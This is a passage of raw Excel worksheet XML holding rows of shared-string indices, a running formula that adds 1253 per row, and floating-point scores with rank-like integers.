      <c r="E1867">
        <v>16.611114501953121</v>
      </c>
      <c r="F1867">
        <v>2</v>
      </c>
    </row>
    <row r="1868" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1868" t="s">
        <v>3601</v>
      </c>
      <c r="B1868" t="s">
        <v>3602</v>
      </c>
      <c r="C1868">
        <f t="shared" si="29"/>
        <v>11769539</v>
      </c>
      <c r="D1868" t="s">
        <v>3503</v>
      </c>
      <c r="E1868">
        <v>27.689521789550781</v>
      </c>
      <c r="F1868">
        <v>1</v>
      </c>
    </row>
    <row r="1869" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1869" t="s">
        <v>3601</v>
      </c>
      <c r="B1869" t="s">
        <v>3602</v>
      </c>
      <c r="C1869">
        <f t="shared" si="29"/>
        <v>11770792</v>
      </c>
      <c r="D1869" t="s">
        <v>3603</v>
      </c>
      <c r="E1869">
        <v>12.572200775146481</v>
      </c>
      <c r="F1869">
        <v>2</v>
      </c>
    </row>
    <row r="1870" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1870" t="s">
        <v>3604</v>
      </c>
      <c r="B1870" t="s">
        <v>3605</v>
      </c>
      <c r="C1870">
        <f t="shared" si="29"/>
        <v>11772045</v>
      </c>
      <c r="D1870" t="s">
        <v>3606</v>
      </c>
      <c r="E1870">
        <v>19.603193283081051</v>
      </c>
      <c r="F1870">
        <v>1</v>
      </c>
    </row>
    <row r="1871" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1871" t="s">
        <v>3604</v>
      </c>
      <c r="B1871" t="s">
        <v>3605</v>
      </c>
      <c r="C1871">
        <f t="shared" si="29"/>
        <v>11773298</v>
      </c>
      <c r="D1871" t="s">
        <v>3607</v>
      </c>
      <c r="E1871">
        <v>0.87748026847839355</v>
      </c>
      <c r="F1871">
        <v>2</v>
      </c>
    </row>
    <row r="1872" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1872" t="s">
        <v>3608</v>
      </c>
      <c r="B1872" t="s">
        <v>3609</v>
      </c>
      <c r="C1872">
        <f t="shared" si="29"/>
        <v>11774551</v>
      </c>
      <c r="D1872" t="s">
        <v>3610</v>
      </c>
      <c r="E1872">
        <v>29.74261474609375</v>
      </c>
      <c r="F1872">
        <v>1</v>
      </c>
    </row>
    <row r="1873" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1873" t="s">
        <v>3608</v>
      </c>
      <c r="B1873" t="s">
        <v>3609</v>
      </c>
      <c r="C1873">
        <f t="shared" si="29"/>
        <v>11775804</v>
      </c>
      <c r="D1873" t="s">
        <v>3611</v>
      </c>
      <c r="E1873">
        <v>11.74290943145752</v>
      </c>
      <c r="F1873">
        <v>2</v>
      </c>
    </row>
    <row r="1874" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1874" t="s">
        <v>3612</v>
      </c>
      <c r="B1874" t="s">
        <v>3613</v>
      </c>
      <c r="C1874">
        <f t="shared" si="29"/>
        <v>11777057</v>
      </c>
      <c r="D1874" t="s">
        <v>3614</v>
      </c>
      <c r="E1874">
        <v>26.907924652099609</v>
      </c>
      <c r="F1874">
        <v>1</v>
      </c>
    </row>
    <row r="1875" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1875" t="s">
        <v>3612</v>
      </c>
      <c r="B1875" t="s">
        <v>3613</v>
      </c>
      <c r="C1875">
        <f t="shared" si="29"/>
        <v>11778310</v>
      </c>
      <c r="D1875" t="s">
        <v>3615</v>
      </c>
      <c r="E1875">
        <v>2.6205611228942871</v>
      </c>
      <c r="F1875">
        <v>2</v>
      </c>
    </row>
    <row r="1876" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1876" t="s">
        <v>3616</v>
      </c>
      <c r="B1876" t="s">
        <v>3617</v>
      </c>
      <c r="C1876">
        <f t="shared" si="29"/>
        <v>11779563</v>
      </c>
      <c r="D1876" t="s">
        <v>3618</v>
      </c>
      <c r="E1876">
        <v>19.5798225402832</v>
      </c>
      <c r="F1876">
        <v>1</v>
      </c>
    </row>
    <row r="1877" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1877" t="s">
        <v>3616</v>
      </c>
      <c r="B1877" t="s">
        <v>3617</v>
      </c>
      <c r="C1877">
        <f t="shared" si="29"/>
        <v>11780816</v>
      </c>
      <c r="D1877" t="s">
        <v>3619</v>
      </c>
      <c r="E1877">
        <v>2.408059686422348E-2</v>
      </c>
      <c r="F1877">
        <v>2</v>
      </c>
    </row>
    <row r="1878" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1878" t="s">
        <v>3620</v>
      </c>
      <c r="B1878" t="s">
        <v>3621</v>
      </c>
      <c r="C1878">
        <f t="shared" si="29"/>
        <v>11782069</v>
      </c>
      <c r="D1878" t="s">
        <v>3622</v>
      </c>
      <c r="E1878">
        <v>26.43086051940918</v>
      </c>
      <c r="F1878">
        <v>1</v>
      </c>
    </row>
    <row r="1879" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1879" t="s">
        <v>3620</v>
      </c>
      <c r="B1879" t="s">
        <v>3621</v>
      </c>
      <c r="C1879">
        <f t="shared" si="29"/>
        <v>11783322</v>
      </c>
      <c r="D1879" t="s">
        <v>3623</v>
      </c>
      <c r="E1879">
        <v>1.023575067520142</v>
      </c>
      <c r="F1879">
        <v>2</v>
      </c>
    </row>
    <row r="1880" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1880" t="s">
        <v>3624</v>
      </c>
      <c r="B1880" t="s">
        <v>3625</v>
      </c>
      <c r="C1880">
        <f t="shared" si="29"/>
        <v>11784575</v>
      </c>
      <c r="D1880" t="s">
        <v>3626</v>
      </c>
      <c r="E1880">
        <v>26.00874137878418</v>
      </c>
      <c r="F1880">
        <v>1</v>
      </c>
    </row>
    <row r="1881" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1881" t="s">
        <v>3624</v>
      </c>
      <c r="B1881" t="s">
        <v>3625</v>
      </c>
      <c r="C1881">
        <f t="shared" si="29"/>
        <v>11785828</v>
      </c>
      <c r="D1881" t="s">
        <v>3627</v>
      </c>
      <c r="E1881">
        <v>13.463907241821291</v>
      </c>
      <c r="F1881">
        <v>2</v>
      </c>
    </row>
    <row r="1882" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1882" t="s">
        <v>3628</v>
      </c>
      <c r="B1882" t="s">
        <v>3629</v>
      </c>
      <c r="C1882">
        <f t="shared" si="29"/>
        <v>11787081</v>
      </c>
      <c r="D1882" t="s">
        <v>3630</v>
      </c>
      <c r="E1882">
        <v>14.486545562744141</v>
      </c>
      <c r="F1882">
        <v>1</v>
      </c>
    </row>
    <row r="1883" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1883" t="s">
        <v>3628</v>
      </c>
      <c r="B1883" t="s">
        <v>3629</v>
      </c>
      <c r="C1883">
        <f t="shared" si="29"/>
        <v>11788334</v>
      </c>
      <c r="D1883" t="s">
        <v>3631</v>
      </c>
      <c r="E1883">
        <v>10.10528659820557</v>
      </c>
      <c r="F1883">
        <v>2</v>
      </c>
    </row>
    <row r="1884" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1884" t="s">
        <v>3632</v>
      </c>
      <c r="B1884" t="s">
        <v>3633</v>
      </c>
      <c r="C1884">
        <f t="shared" si="29"/>
        <v>11789587</v>
      </c>
      <c r="D1884" t="s">
        <v>3634</v>
      </c>
      <c r="E1884">
        <v>29.059640884399411</v>
      </c>
      <c r="F1884">
        <v>1</v>
      </c>
    </row>
    <row r="1885" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1885" t="s">
        <v>3632</v>
      </c>
      <c r="B1885" t="s">
        <v>3633</v>
      </c>
      <c r="C1885">
        <f t="shared" si="29"/>
        <v>11790840</v>
      </c>
      <c r="D1885" t="s">
        <v>3635</v>
      </c>
      <c r="E1885">
        <v>6.9120182991027832</v>
      </c>
      <c r="F1885">
        <v>2</v>
      </c>
    </row>
    <row r="1886" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1886" t="s">
        <v>3636</v>
      </c>
      <c r="B1886" t="s">
        <v>3637</v>
      </c>
      <c r="C1886">
        <f t="shared" si="29"/>
        <v>11792093</v>
      </c>
      <c r="D1886" t="s">
        <v>3638</v>
      </c>
      <c r="E1886">
        <v>28.586668014526371</v>
      </c>
      <c r="F1886">
        <v>1</v>
      </c>
    </row>
    <row r="1887" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1887" t="s">
        <v>3636</v>
      </c>
      <c r="B1887" t="s">
        <v>3637</v>
      </c>
      <c r="C1887">
        <f t="shared" si="29"/>
        <v>11793346</v>
      </c>
      <c r="D1887" t="s">
        <v>3639</v>
      </c>
      <c r="E1887">
        <v>3.246505511924624E-3</v>
      </c>
      <c r="F1887">
        <v>2</v>
      </c>
    </row>
    <row r="1888" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1888" t="s">
        <v>3640</v>
      </c>
      <c r="B1888" t="s">
        <v>3641</v>
      </c>
      <c r="C1888">
        <f t="shared" si="29"/>
        <v>11794599</v>
      </c>
      <c r="D1888" t="s">
        <v>3642</v>
      </c>
      <c r="E1888">
        <v>16.58187103271484</v>
      </c>
      <c r="F1888">
        <v>1</v>
      </c>
    </row>
    <row r="1889" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1889" t="s">
        <v>3640</v>
      </c>
      <c r="B1889" t="s">
        <v>3641</v>
      </c>
      <c r="C1889">
        <f t="shared" si="29"/>
        <v>11795852</v>
      </c>
      <c r="D1889" t="s">
        <v>3643</v>
      </c>
      <c r="E1889">
        <v>11.991951942443849</v>
      </c>
      <c r="F1889">
        <v>2</v>
      </c>
    </row>
    <row r="1890" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1890" t="s">
        <v>3644</v>
      </c>
      <c r="B1890" t="s">
        <v>3645</v>
      </c>
      <c r="C1890">
        <f t="shared" si="29"/>
        <v>11797105</v>
      </c>
      <c r="D1890" t="s">
        <v>3646</v>
      </c>
      <c r="E1890">
        <v>33.643058776855469</v>
      </c>
      <c r="F1890">
        <v>1</v>
      </c>
    </row>
    <row r="1891" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1891" t="s">
        <v>3644</v>
      </c>
      <c r="B1891" t="s">
        <v>3645</v>
      </c>
      <c r="C1891">
        <f t="shared" si="29"/>
        <v>11798358</v>
      </c>
      <c r="D1891" t="s">
        <v>3647</v>
      </c>
      <c r="E1891">
        <v>7.3730192184448242</v>
      </c>
      <c r="F1891">
        <v>2</v>
      </c>
    </row>
    <row r="1892" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1892" t="s">
        <v>3648</v>
      </c>
      <c r="B1892" t="s">
        <v>3649</v>
      </c>
      <c r="C1892">
        <f t="shared" si="29"/>
        <v>11799611</v>
      </c>
      <c r="D1892" t="s">
        <v>3650</v>
      </c>
      <c r="E1892">
        <v>31.360366821289059</v>
      </c>
      <c r="F1892">
        <v>1</v>
      </c>
    </row>
    <row r="1893" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1893" t="s">
        <v>3648</v>
      </c>
      <c r="B1893" t="s">
        <v>3649</v>
      </c>
      <c r="C1893">
        <f t="shared" si="29"/>
        <v>11800864</v>
      </c>
      <c r="D1893" t="s">
        <v>3651</v>
      </c>
      <c r="E1893">
        <v>1.9706545863300562E-3</v>
      </c>
      <c r="F1893">
        <v>2</v>
      </c>
    </row>
    <row r="1894" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1894" t="s">
        <v>3652</v>
      </c>
      <c r="B1894" t="s">
        <v>3653</v>
      </c>
      <c r="C1894">
        <f t="shared" si="29"/>
        <v>11802117</v>
      </c>
      <c r="D1894" t="s">
        <v>3654</v>
      </c>
      <c r="E1894">
        <v>34.077133178710938</v>
      </c>
      <c r="F1894">
        <v>1</v>
      </c>
    </row>
    <row r="1895" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1895" t="s">
        <v>3652</v>
      </c>
      <c r="B1895" t="s">
        <v>3653</v>
      </c>
      <c r="C1895">
        <f t="shared" si="29"/>
        <v>11803370</v>
      </c>
      <c r="D1895" t="s">
        <v>3655</v>
      </c>
      <c r="E1895">
        <v>5.0470485687255859</v>
      </c>
      <c r="F1895">
        <v>2</v>
      </c>
    </row>
    <row r="1896" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1896" t="s">
        <v>3656</v>
      </c>
      <c r="B1896" t="s">
        <v>3657</v>
      </c>
      <c r="C1896">
        <f t="shared" si="29"/>
        <v>11804623</v>
      </c>
      <c r="D1896" t="s">
        <v>3658</v>
      </c>
      <c r="E1896">
        <v>25.951192855834961</v>
      </c>
      <c r="F1896">
        <v>1</v>
      </c>
    </row>
    <row r="1897" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1897" t="s">
        <v>3656</v>
      </c>
      <c r="B1897" t="s">
        <v>3657</v>
      </c>
      <c r="C1897">
        <f t="shared" si="29"/>
        <v>11805876</v>
      </c>
      <c r="D1897" t="s">
        <v>3659</v>
      </c>
      <c r="E1897">
        <v>1.978827118873596</v>
      </c>
      <c r="F1897">
        <v>2</v>
      </c>
    </row>
    <row r="1898" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1898" t="s">
        <v>3660</v>
      </c>
      <c r="B1898" t="s">
        <v>3661</v>
      </c>
      <c r="C1898">
        <f t="shared" si="29"/>
        <v>11807129</v>
      </c>
      <c r="D1898" t="s">
        <v>3662</v>
      </c>
      <c r="E1898">
        <v>20.405715942382809</v>
      </c>
      <c r="F1898">
        <v>1</v>
      </c>
    </row>
    <row r="1899" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1899" t="s">
        <v>3660</v>
      </c>
      <c r="B1899" t="s">
        <v>3661</v>
      </c>
      <c r="C1899">
        <f t="shared" si="29"/>
        <v>11808382</v>
      </c>
      <c r="D1899" t="s">
        <v>3663</v>
      </c>
      <c r="E1899">
        <v>5.709477424621582</v>
      </c>
      <c r="F1899">
        <v>2</v>
      </c>
    </row>
    <row r="1900" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1900" t="s">
        <v>3664</v>
      </c>
      <c r="B1900" t="s">
        <v>3665</v>
      </c>
      <c r="C1900">
        <f t="shared" si="29"/>
        <v>11809635</v>
      </c>
      <c r="D1900" t="s">
        <v>3666</v>
      </c>
      <c r="E1900">
        <v>23.249998092651371</v>
      </c>
      <c r="F1900">
        <v>1</v>
      </c>
    </row>
    <row r="1901" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1901" t="s">
        <v>3664</v>
      </c>
      <c r="B1901" t="s">
        <v>3665</v>
      </c>
      <c r="C1901">
        <f t="shared" si="29"/>
        <v>11810888</v>
      </c>
      <c r="D1901" t="s">
        <v>3667</v>
      </c>
      <c r="E1901">
        <v>0.45385006070137018</v>
      </c>
      <c r="F1901">
        <v>2</v>
      </c>
    </row>
    <row r="1902" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1902" t="s">
        <v>3668</v>
      </c>
      <c r="B1902" t="s">
        <v>3669</v>
      </c>
      <c r="C1902">
        <f t="shared" si="29"/>
        <v>11812141</v>
      </c>
      <c r="D1902" t="s">
        <v>3662</v>
      </c>
      <c r="E1902">
        <v>18.723173141479489</v>
      </c>
      <c r="F1902">
        <v>1</v>
      </c>
    </row>
    <row r="1903" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1903" t="s">
        <v>3668</v>
      </c>
      <c r="B1903" t="s">
        <v>3669</v>
      </c>
      <c r="C1903">
        <f t="shared" si="29"/>
        <v>11813394</v>
      </c>
      <c r="D1903" t="s">
        <v>3670</v>
      </c>
      <c r="E1903">
        <v>6.8152456283569336</v>
      </c>
      <c r="F1903">
        <v>2</v>
      </c>
    </row>
    <row r="1904" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1904" t="s">
        <v>3671</v>
      </c>
      <c r="B1904" t="s">
        <v>3672</v>
      </c>
      <c r="C1904">
        <f t="shared" si="29"/>
        <v>11814647</v>
      </c>
      <c r="D1904" t="s">
        <v>3673</v>
      </c>
      <c r="E1904">
        <v>31.9216194152832</v>
      </c>
      <c r="F1904">
        <v>1</v>
      </c>
    </row>
    <row r="1905" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1905" t="s">
        <v>3671</v>
      </c>
      <c r="B1905" t="s">
        <v>3672</v>
      </c>
      <c r="C1905">
        <f t="shared" si="29"/>
        <v>11815900</v>
      </c>
      <c r="D1905" t="s">
        <v>3674</v>
      </c>
      <c r="E1905">
        <v>3.5622064024209982E-4</v>
      </c>
      <c r="F1905">
        <v>2</v>
      </c>
    </row>
    <row r="1906" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1906" t="s">
        <v>3675</v>
      </c>
      <c r="B1906" t="s">
        <v>3676</v>
      </c>
      <c r="C1906">
        <f t="shared" si="29"/>
        <v>11817153</v>
      </c>
      <c r="D1906" t="s">
        <v>3677</v>
      </c>
      <c r="E1906">
        <v>28.631048202514648</v>
      </c>
      <c r="F1906">
        <v>1</v>
      </c>
    </row>
    <row r="1907" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1907" t="s">
        <v>3675</v>
      </c>
      <c r="B1907" t="s">
        <v>3676</v>
      </c>
      <c r="C1907">
        <f t="shared" si="29"/>
        <v>11818406</v>
      </c>
      <c r="D1907" t="s">
        <v>3678</v>
      </c>
      <c r="E1907">
        <v>0.68698298931121826</v>
      </c>
      <c r="F1907">
        <v>2</v>
      </c>
    </row>
    <row r="1908" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1908" t="s">
        <v>3679</v>
      </c>
      <c r="B1908" t="s">
        <v>3680</v>
      </c>
      <c r="C1908">
        <f t="shared" si="29"/>
        <v>11819659</v>
      </c>
      <c r="D1908" t="s">
        <v>3681</v>
      </c>
      <c r="E1908">
        <v>34.422351837158203</v>
      </c>
      <c r="F1908">
        <v>1</v>
      </c>
    </row>
    <row r="1909" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1909" t="s">
        <v>3679</v>
      </c>
      <c r="B1909" t="s">
        <v>3680</v>
      </c>
      <c r="C1909">
        <f t="shared" si="29"/>
        <v>11820912</v>
      </c>
      <c r="D1909" t="s">
        <v>3682</v>
      </c>
      <c r="E1909">
        <v>1.645982027053833</v>
      </c>
      <c r="F1909">
        <v>2</v>
      </c>
    </row>
    <row r="1910" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1910" t="s">
        <v>3683</v>
      </c>
      <c r="B1910" t="s">
        <v>3684</v>
      </c>
      <c r="C1910">
        <f t="shared" si="29"/>
        <v>11822165</v>
      </c>
      <c r="D1910" t="s">
        <v>3685</v>
      </c>
      <c r="E1910">
        <v>22.93339920043945</v>
      </c>
      <c r="F1910">
        <v>1</v>
      </c>
    </row>
    <row r="1911" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1911" t="s">
        <v>3683</v>
      </c>
      <c r="B1911" t="s">
        <v>3684</v>
      </c>
      <c r="C1911">
        <f t="shared" si="29"/>
        <v>11823418</v>
      </c>
      <c r="D1911" t="s">
        <v>3686</v>
      </c>
      <c r="E1911">
        <v>17.371576309204102</v>
      </c>
      <c r="F1911">
        <v>2</v>
      </c>
    </row>
    <row r="1912" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1912" t="s">
        <v>3683</v>
      </c>
      <c r="B1912" t="s">
        <v>3684</v>
      </c>
      <c r="C1912">
        <f t="shared" si="29"/>
        <v>11824671</v>
      </c>
      <c r="D1912" t="s">
        <v>3687</v>
      </c>
      <c r="E1912">
        <v>11.693472862243651</v>
      </c>
      <c r="F1912">
        <v>3</v>
      </c>
    </row>
    <row r="1913" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1913" t="s">
        <v>3688</v>
      </c>
      <c r="B1913" t="s">
        <v>3689</v>
      </c>
      <c r="C1913">
        <f t="shared" si="29"/>
        <v>11825924</v>
      </c>
      <c r="D1913" t="s">
        <v>3690</v>
      </c>
      <c r="E1913">
        <v>27.572458267211911</v>
      </c>
      <c r="F1913">
        <v>1</v>
      </c>
    </row>
    <row r="1914" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1914" t="s">
        <v>3688</v>
      </c>
      <c r="B1914" t="s">
        <v>3689</v>
      </c>
      <c r="C1914">
        <f t="shared" si="29"/>
        <v>11827177</v>
      </c>
      <c r="D1914" t="s">
        <v>3691</v>
      </c>
      <c r="E1914">
        <v>10.16666412353516</v>
      </c>
      <c r="F1914">
        <v>2</v>
      </c>
    </row>
    <row r="1915" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1915" t="s">
        <v>3692</v>
      </c>
      <c r="B1915" t="s">
        <v>3693</v>
      </c>
      <c r="C1915">
        <f t="shared" si="29"/>
        <v>11828430</v>
      </c>
      <c r="D1915" t="s">
        <v>3694</v>
      </c>
      <c r="E1915">
        <v>26.81754112243652</v>
      </c>
      <c r="F1915">
        <v>1</v>
      </c>
    </row>
    <row r="1916" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1916" t="s">
        <v>3692</v>
      </c>
      <c r="B1916" t="s">
        <v>3693</v>
      </c>
      <c r="C1916">
        <f t="shared" si="29"/>
        <v>11829683</v>
      </c>
      <c r="D1916" t="s">
        <v>3695</v>
      </c>
      <c r="E1916">
        <v>2.2852841357234871E-4</v>
      </c>
      <c r="F1916">
        <v>2</v>
      </c>
    </row>
    <row r="1917" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1917" t="s">
        <v>3696</v>
      </c>
      <c r="B1917" t="s">
        <v>3697</v>
      </c>
      <c r="C1917">
        <f t="shared" si="29"/>
        <v>11830936</v>
      </c>
      <c r="D1917" t="s">
        <v>3698</v>
      </c>
      <c r="E1917">
        <v>15.512269973754879</v>
      </c>
      <c r="F1917">
        <v>1</v>
      </c>
    </row>
    <row r="1918" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1918" t="s">
        <v>3696</v>
      </c>
      <c r="B1918" t="s">
        <v>3697</v>
      </c>
      <c r="C1918">
        <f t="shared" si="29"/>
        <v>11832189</v>
      </c>
      <c r="D1918" t="s">
        <v>3699</v>
      </c>
      <c r="E1918">
        <v>12.400465965271</v>
      </c>
      <c r="F1918">
        <v>2</v>
      </c>
    </row>
    <row r="1919" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1919" t="s">
        <v>3700</v>
      </c>
      <c r="B1919" t="s">
        <v>3701</v>
      </c>
      <c r="C1919">
        <f t="shared" si="29"/>
        <v>11833442</v>
      </c>
      <c r="D1919" t="s">
        <v>3702</v>
      </c>
      <c r="E1919">
        <v>25.091140747070309</v>
      </c>
      <c r="F1919">
        <v>1</v>
      </c>
    </row>
    <row r="1920" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1920" t="s">
        <v>3700</v>
      </c>
      <c r="B1920" t="s">
        <v>3701</v>
      </c>
      <c r="C1920">
        <f t="shared" si="29"/>
        <v>11834695</v>
      </c>
      <c r="D1920" t="s">
        <v>3703</v>
      </c>
      <c r="E1920">
        <v>0.26847606897354132</v>
      </c>
      <c r="F1920">
        <v>2</v>
      </c>
    </row>
    <row r="1921" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1921" t="s">
        <v>3704</v>
      </c>
      <c r="B1921" t="s">
        <v>3705</v>
      </c>
      <c r="C1921">
        <f t="shared" si="29"/>
        <v>11835948</v>
      </c>
      <c r="D1921" t="s">
        <v>3706</v>
      </c>
      <c r="E1921">
        <v>26.435895919799801</v>
      </c>
      <c r="F1921">
        <v>1</v>
      </c>
    </row>
    <row r="1922" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1922" t="s">
        <v>3704</v>
      </c>
      <c r="B1922" t="s">
        <v>3705</v>
      </c>
      <c r="C1922">
        <f t="shared" si="29"/>
        <v>11837201</v>
      </c>
      <c r="D1922" t="s">
        <v>3707</v>
      </c>
      <c r="E1922">
        <v>13.96262168884277</v>
      </c>
      <c r="F1922">
        <v>2</v>
      </c>
    </row>
    <row r="1923" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1923" t="s">
        <v>3708</v>
      </c>
      <c r="B1923" t="s">
        <v>3709</v>
      </c>
      <c r="C1923">
        <f t="shared" si="29"/>
        <v>11838454</v>
      </c>
      <c r="D1923" t="s">
        <v>3710</v>
      </c>
      <c r="E1923">
        <v>23.52290153503418</v>
      </c>
      <c r="F1923">
        <v>1</v>
      </c>
    </row>
    <row r="1924" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1924" t="s">
        <v>3708</v>
      </c>
      <c r="B1924" t="s">
        <v>3709</v>
      </c>
      <c r="C1924">
        <f t="shared" si="29"/>
        <v>11839707</v>
      </c>
      <c r="D1924" t="s">
        <v>3711</v>
      </c>
      <c r="E1924">
        <v>1.253517746925354</v>
      </c>
      <c r="F1924">
        <v>2</v>
      </c>
    </row>
    <row r="1925" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1925" t="s">
        <v>3712</v>
      </c>
      <c r="B1925" t="s">
        <v>3713</v>
      </c>
      <c r="C1925">
        <f t="shared" si="29"/>
        <v>11840960</v>
      </c>
      <c r="D1925" t="s">
        <v>3714</v>
      </c>
      <c r="E1925">
        <v>20.251312255859379</v>
      </c>
      <c r="F1925">
        <v>1</v>
      </c>
    </row>
    <row r="1926" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1926" t="s">
        <v>3712</v>
      </c>
      <c r="B1926" t="s">
        <v>3713</v>
      </c>
      <c r="C1926">
        <f t="shared" si="29"/>
        <v>11842213</v>
      </c>
      <c r="D1926" t="s">
        <v>3715</v>
      </c>
      <c r="E1926">
        <v>4.1430740356445313</v>
      </c>
      <c r="F1926">
        <v>2</v>
      </c>
    </row>
    <row r="1927" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1927" t="s">
        <v>3716</v>
      </c>
      <c r="B1927" t="s">
        <v>3717</v>
      </c>
      <c r="C1927">
        <f t="shared" si="29"/>
        <v>11843466</v>
      </c>
      <c r="D1927" t="s">
        <v>3718</v>
      </c>
      <c r="E1927">
        <v>23.286941528320309</v>
      </c>
      <c r="F1927">
        <v>1</v>
      </c>
    </row>
    <row r="1928" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1928" t="s">
        <v>3716</v>
      </c>
      <c r="B1928" t="s">
        <v>3717</v>
      </c>
      <c r="C1928">
        <f t="shared" si="29"/>
        <v>11844719</v>
      </c>
      <c r="D1928" t="s">
        <v>3719</v>
      </c>
      <c r="E1928">
        <v>1.318018917118025E-6</v>
      </c>
      <c r="F1928">
        <v>2</v>
      </c>
    </row>
    <row r="1929" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1929" t="s">
        <v>3720</v>
      </c>
      <c r="B1929" t="s">
        <v>3721</v>
      </c>
      <c r="C1929">
        <f t="shared" si="29"/>
        <v>11845972</v>
      </c>
      <c r="D1929" t="s">
        <v>3722</v>
      </c>
      <c r="E1929">
        <v>33.180648803710938</v>
      </c>
      <c r="F1929">
        <v>1</v>
      </c>
    </row>
    <row r="1930" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1930" t="s">
        <v>3720</v>
      </c>
      <c r="B1930" t="s">
        <v>3721</v>
      </c>
      <c r="C1930">
        <f t="shared" ref="C1930:C1993" si="30">C1929+1253</f>
        <v>11847225</v>
      </c>
      <c r="D1930" t="s">
        <v>3723</v>
      </c>
      <c r="E1930">
        <v>10.246939659118651</v>
      </c>
      <c r="F1930">
        <v>2</v>
      </c>
    </row>
    <row r="1931" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1931" t="s">
        <v>3724</v>
      </c>
      <c r="B1931" t="s">
        <v>3725</v>
      </c>
      <c r="C1931">
        <f t="shared" si="30"/>
        <v>11848478</v>
      </c>
      <c r="D1931" t="s">
        <v>3726</v>
      </c>
      <c r="E1931">
        <v>1.3234425783157351</v>
      </c>
      <c r="F1931">
        <v>1</v>
      </c>
    </row>
    <row r="1932" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1932" t="s">
        <v>3724</v>
      </c>
      <c r="B1932" t="s">
        <v>3725</v>
      </c>
      <c r="C1932">
        <f t="shared" si="30"/>
        <v>11849731</v>
      </c>
      <c r="D1932" t="s">
        <v>3727</v>
      </c>
